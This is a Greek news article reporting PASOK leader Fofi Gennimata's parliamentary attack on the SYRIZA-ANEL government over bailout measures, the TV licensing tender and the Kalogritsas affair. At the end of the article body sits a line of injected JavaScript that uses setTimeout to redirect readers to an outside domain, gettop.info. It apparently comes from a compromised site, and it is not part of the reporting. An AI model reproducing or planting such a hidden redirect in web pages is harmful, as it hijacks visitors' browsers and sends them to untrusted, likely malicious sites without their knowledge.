Γεννηματά: Άνευ όρων παράδοση του εθνικού πλούτου

0
9

 

Στην παρέμβαση της στη συζήτηση της ψήφισης των προαπαιτούμενων μέτρων, η πρόεδρος του ΠΑΣΟΚ Φώφη Γεννηματά, εξαπέλυσε σφοδρή επίθεση κατά της κυβέρνησης.

«Πρόθυμοι, υπάκουοι και υποταγμένοι στις πιο σκληρές απαιτήσεις των δανειστών, ο πρωθυπουργός, η κυβέρνηση και οι βουλευτές των ΣΥΡΙΖΑ-ΑΝΕΛ με την ψήφο τους, ολοκληρώνουν την άνευ όρων παράδοση του εθνικού πλούτου σε ξένα συμφέροντα», τόνισε η πρόεδρος του ΠΑΣΟΚ.

Σύμφωνα με την Φώφη Γεννηματα «η κυβέρνηση, μπροστά στα αδιέξοδα της πολιτικής της συντηρεί και ανατροφοδοτεί μια στείρα πόλωση με διχαστικό αντίκτυπο που τρώει τα σωθικά της κοινωνίας. Διολισθαίνει σε καθεστωτικές πρακτικές και λογικές, σε αντιπερισπασμούς που κάνουν ζημιά στη χώρα».

Η πρόεδρος του ΠΑΣΟΚ αναφέρθηκε στη διαδικασία αδειοδότησης των τηλεοπτικών σταθμών λέγοντας πως έσκασε στα χέρια της κυβέρνησης η φούσκα της «για πρώτη φορά νομιμότητας» στο τηλεοπτικό τοπίο. «Οι σκελετοί που επιχειρήθηκε άρον-άρον να κρυφτούν σε απόμερα βοσκοτόπια και σε τραπεζικές θυρίδες είναι πια σε κοινή θέα», τόνισε χαρακτηριστικά.

Αναφερόμενη στην απoxώρηση Καλογρίτσα σημείωσε πως το «τρίγωνο της διαπλοκής μεταξύ κυβέρνησης-Καλογρίτσα-Τράπεζα Αττικής έχει αποκαλυφθεί. Η ΣΥΡΙΖΑ bank χρηματοδότησε τον εργολάβο για να κάνει το ΣΥΡΙΖΑ channel με φυσικούς αυτουργούς και ενορχηστρωτές τον κ. Παππά και τον κ. Σπίρτζη, αλλά ο πρωθυπουργός έχει την ηθική και πολιτική ευθύνη».

Η Φώφη Γεννηματά υποστήριξε πως «πολιτικά, ηθικά και νομικά ο διαγωνισμός έχει καταρρεύσει. Τώρα είναι η ώρα του εισαγγελέα».

Για το υπό ψήφιση πολυνομοσχέδιο η πρόεδρος του ΠΑΣΟΚ υπογράμμισε πως σήμερα αποκαλύπτεται άλλη μια εξαπάτηση των πολιτών από την κυβέρνηση. «Σήμερα οι βουλευτές των ΣΥΡΙΖΑ ΑΝΕΛ θα ψηφίσουν: Η ΕΥΔΑΠ, η ΕΥΑΘ, η ΕΛΒΟ, το Αττικό Μετρό, να παραδοθούν στο ελεγχόμενο από την Τρόικα υπερταμείο, τουλάχιστον για 99 χρόνια», ανέφερε η Φώφη Γεννηματά και συμπλήρωσε: «Με δικαίωμα πώλησης, ασφυκτικό έλεγχο των Διοικήσεων, των τιμολογίων προς τους πολίτες και των επενδύσεών τους καθώς και με αρνητικές παρεμβάσεις στα θέματα προσωπικού». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here